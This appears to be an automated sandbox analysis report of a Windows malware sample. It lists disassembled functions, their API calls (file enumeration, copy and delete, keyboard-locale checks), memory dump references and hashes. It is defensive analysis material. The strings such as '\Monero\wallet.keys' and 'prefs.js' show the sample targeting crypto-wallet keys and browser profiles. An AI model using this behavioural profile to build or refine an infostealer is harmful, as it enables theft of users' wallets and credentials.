                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00274580
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00274587
                        • wsprintfA.USER32 ref: 002745A6
                        • FindFirstFileA.KERNEL32(?,?), ref: 002745BD
                        • StrCmpCA.SHLWAPI(?,00280FC4), ref: 002745EB
                        • StrCmpCA.SHLWAPI(?,00280FC8), ref: 00274601
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0027468B
                        • FindClose.KERNEL32(000000FF), ref: 002746A0
                        • lstrcat.KERNEL32(?,00E2E928), ref: 002746C5
                        • lstrcat.KERNEL32(?,00E2DAF0), ref: 002746D8
                        • lstrlen.KERNEL32(?), ref: 002746E5
                        • lstrlen.KERNEL32(?), ref: 002746F6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                        • String ID: %s\%s$%s\*$(
                        • API String ID: 671575355-3827042449
                        • Opcode ID: f5c3dbfc2e39d314294f0ddd028cb51a88c93651c79001d4a141faa44332c80a
                        • Instruction ID: 126de215eeaa4e77da6b2552ab1b0bdb7f117860f5c63ad2c525df7a5698662a
                        • Opcode Fuzzy Hash: f5c3dbfc2e39d314294f0ddd028cb51a88c93651c79001d4a141faa44332c80a
                        • Instruction Fuzzy Hash: 015183B59102189BC760FB70DC89FEE777CAB58300F408598F60D92190EB749BA4CF96
                        Function 00273EA0 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 133fileCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 00273EC3
                        • FindFirstFileA.KERNEL32(?,?), ref: 00273EDA
                        • StrCmpCA.SHLWAPI(?,00280FAC), ref: 00273F08
                        • StrCmpCA.SHLWAPI(?,00280FB0), ref: 00273F1E
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0027406C
                        • FindClose.KERNEL32(000000FF), ref: 00274081
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\%s$($(
                        • API String ID: 180737720-2702466942
                        • Opcode ID: 948649bc42316df080de3ee3acb8d9159482520d14c5ed126280f18a6bae501b
                        • Instruction ID: 2ee3bcdac4cdbb7e23a36c09fef926467ee12409968ad06100bc1ba321fb06fc
                        • Opcode Fuzzy Hash: 948649bc42316df080de3ee3acb8d9159482520d14c5ed126280f18a6bae501b
                        • Instruction Fuzzy Hash: D05186B2910218ABCB24FBB0DC85EEE777CBB44300F40859CB25D96080DB759BA9CF95
                        Function 0026ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 0026ED3E
                        • FindFirstFileA.KERNEL32(?,?), ref: 0026ED55
                        • StrCmpCA.SHLWAPI(?,00281538), ref: 0026EDAB
                        • StrCmpCA.SHLWAPI(?,0028153C), ref: 0026EDC1
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0026F2AE
                        • FindClose.KERNEL32(000000FF), ref: 0026F2C3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\*.*
                        • API String ID: 180737720-1013718255
                        • Opcode ID: 5de4a086b27ebe23a9f7012d32d626e49e942822115c4cb29299e107982bda08
                        • Instruction ID: 73d4e438e60780bc6313c5aa4e6d13c685ee58a9c558b47abe26a6ca627fe162
                        • Opcode Fuzzy Hash: 5de4a086b27ebe23a9f7012d32d626e49e942822115c4cb29299e107982bda08
                        • Instruction Fuzzy Hash: A6E1D1719211189ADB54FB60DC52EEE733CAF94310F4085A9B51F62092EF306FAACF56
                        Function 0026F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                          • Part of subcall function 0027A920: lstrcpy.KERNEL32(00000000,?), ref: 0027A972
                          • Part of subcall function 0027A920: lstrcat.KERNEL32(00000000), ref: 0027A982
                          • Part of subcall function 0027A9B0: lstrlen.KERNEL32(?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 0027A9C5
                          • Part of subcall function 0027A9B0: lstrcpy.KERNEL32(00000000), ref: 0027AA04
                          • Part of subcall function 0027A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0027AA12
                          • Part of subcall function 0027A8A0: lstrcpy.KERNEL32(?,00280E17), ref: 0027A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,002815B8,00280D96), ref: 0026F71E
                        • StrCmpCA.SHLWAPI(?,002815BC), ref: 0026F76F
                        • StrCmpCA.SHLWAPI(?,002815C0), ref: 0026F785
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0026FAB1
                        • FindClose.KERNEL32(000000FF), ref: 0026FAC3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID: prefs.js
                        • API String ID: 3334442632-3783873740
                        • Opcode ID: dbf6ff12a3293566f10f7d0b3b9a56b7908e6a6d14194f3f7d9ae848de3397a3
                        • Instruction ID: 9e7f3ac1d66a57722449e282687102efca10d9c74a1e46bc2183eb9d75c293d2
                        • Opcode Fuzzy Hash: dbf6ff12a3293566f10f7d0b3b9a56b7908e6a6d14194f3f7d9ae848de3397a3
                        • Instruction Fuzzy Hash: B1B162719201089BDB64FF74DD96EEE7379AF94310F4085A8A40E97181EF306B69CF92
                        Function 002616D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0028510C,?,?,?,002851B4,?,?,00000000,?,00000000), ref: 00261923
                        • StrCmpCA.SHLWAPI(?,0028525C), ref: 00261973
                        • StrCmpCA.SHLWAPI(?,00285304), ref: 00261989
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00261D40
                        • DeleteFileA.KERNEL32(00000000), ref: 00261DCA
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00261E20
                        • FindClose.KERNEL32(000000FF), ref: 00261E32
                          • Part of subcall function 0027A920: lstrcpy.KERNEL32(00000000,?), ref: 0027A972
                          • Part of subcall function 0027A920: lstrcat.KERNEL32(00000000), ref: 0027A982
                          • Part of subcall function 0027A9B0: lstrlen.KERNEL32(?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 0027A9C5
                          • Part of subcall function 0027A9B0: lstrcpy.KERNEL32(00000000), ref: 0027AA04
                          • Part of subcall function 0027A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0027AA12
                          • Part of subcall function 0027A8A0: lstrcpy.KERNEL32(?,00280E17), ref: 0027A905
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                        • String ID: \*.*
                        • API String ID: 1415058207-1173974218
                        • Opcode ID: d6beaf4df9f1c3b083cbbae90dbad6f58e2f839071dd3821986b2413f7c113ae
                        • Instruction ID: 24050df4d4c41f46976c4e514aed91397115df6f61da89ada7b6fb4b8236a72a
                        • Opcode Fuzzy Hash: d6beaf4df9f1c3b083cbbae90dbad6f58e2f839071dd3821986b2413f7c113ae
                        • Instruction Fuzzy Hash: F01206719311189BDB59FB60CC96EEE7378AF94310F408199B51E62091EF306FA9CF92
                        Function 0026DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                          • Part of subcall function 0027A9B0: lstrlen.KERNEL32(?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 0027A9C5
                          • Part of subcall function 0027A9B0: lstrcpy.KERNEL32(00000000), ref: 0027AA04
                          • Part of subcall function 0027A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0027AA12
                          • Part of subcall function 0027A8A0: lstrcpy.KERNEL32(?,00280E17), ref: 0027A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00280C2E), ref: 0026DE5E
                        • StrCmpCA.SHLWAPI(?,002814C8), ref: 0026DEAE
                        • StrCmpCA.SHLWAPI(?,002814CC), ref: 0026DEC4
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0026E3E0
                        • FindClose.KERNEL32(000000FF), ref: 0026E3F2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                        • String ID: \*.*
                        • API String ID: 2325840235-1173974218
                        • Opcode ID: cab9b6ed129d67fe0f9f6327015871f0d0be5b469e6b575683869192d0b83940
                        • Instruction ID: 4dac160106d51ebe18d65a9d95b39c35ed278b61713b0c2587e8613fdcb28e80
                        • Opcode Fuzzy Hash: cab9b6ed129d67fe0f9f6327015871f0d0be5b469e6b575683869192d0b83940
                        • Instruction Fuzzy Hash: 13F191759301189ADB15FB60CC96EEE7338BF54310F8081E9A51E62091EF306FAACF56
                        Function 0026DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                          • Part of subcall function 0027A920: lstrcpy.KERNEL32(00000000,?), ref: 0027A972
                          • Part of subcall function 0027A920: lstrcat.KERNEL32(00000000), ref: 0027A982
                          • Part of subcall function 0027A9B0: lstrlen.KERNEL32(?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 0027A9C5
                          • Part of subcall function 0027A9B0: lstrcpy.KERNEL32(00000000), ref: 0027AA04
                          • Part of subcall function 0027A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0027AA12
                          • Part of subcall function 0027A8A0: lstrcpy.KERNEL32(?,00280E17), ref: 0027A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,002814B0,00280C2A), ref: 0026DAEB
                        • StrCmpCA.SHLWAPI(?,002814B4), ref: 0026DB33
                        • StrCmpCA.SHLWAPI(?,002814B8), ref: 0026DB49
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0026DDCC
                        • FindClose.KERNEL32(000000FF), ref: 0026DDDE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID:
                        • API String ID: 3334442632-0
                        • Opcode ID: 5850d36621fdb13460501a4a90ab823df82d56ff99bd0e787a66e7d4a943ef3c
                        • Instruction ID: 23a3741ac4289250625a69b3849907724423bbb9d58fb6faa99a35dff13c6e92
                        • Opcode Fuzzy Hash: 5850d36621fdb13460501a4a90ab823df82d56ff99bd0e787a66e7d4a943ef3c
                        • Instruction Fuzzy Hash: B0913372A201089BCB14FF74DC569EE777CABC4310F408668B91A96181EE349B79CF97
                        Function 00277B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                        • GetKeyboardLayoutList.USER32(00000000,00000000,002805AF), ref: 00277BE1
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00277BF9
                        • GetKeyboardLayoutList.USER32(?,00000000), ref: 00277C0D
                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00277C62
                        • LocalFree.KERNEL32(00000000), ref: 00277D22
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                        • String ID: /
                        • API String ID: 3090951853-4001269591
                        • Opcode ID: 63c7a6a3b0bf36d28ad132afdfd343cc676dcae3cae59e7a0938a5213d7f91ee
                        • Instruction ID: e07dc47ead2fd7d9517c4946cbe08ec8a85f4677cd4175511046207751545580
                        • Opcode Fuzzy Hash: 63c7a6a3b0bf36d28ad132afdfd343cc676dcae3cae59e7a0938a5213d7f91ee
                        • Instruction Fuzzy Hash: 04416E71961118ABDB24DF54DC89FEEB778FF48700F208199E10A62180DB742F95CFA6
                        Function 00622FF4 Relevance: 10.4, Strings: 7, Instructions: 1655COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: ;f{z$CR,~$CT{u$Fq]$[[_w$"?$zx
                        • API String ID: 0-3733408663
                        • Opcode ID: fba56673414499b0153fd3536dfd098ef16fdd4e318973f70a8d43de0143bb0e
                        • Instruction ID: 9a7a0462d9f0ffacb4eb2d0cd134e597ab194445999fd7d6e39828d708fa60f6
                        • Opcode Fuzzy Hash: fba56673414499b0153fd3536dfd098ef16fdd4e318973f70a8d43de0143bb0e
                        • Instruction Fuzzy Hash: 26B209F3A0C200AFE3146E2DEC8567AB7E9EFD4720F1A453DE6C4C3744EA3558058696
                        Function 0061DFCA Relevance: 10.4, Strings: 7, Instructions: 1630COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
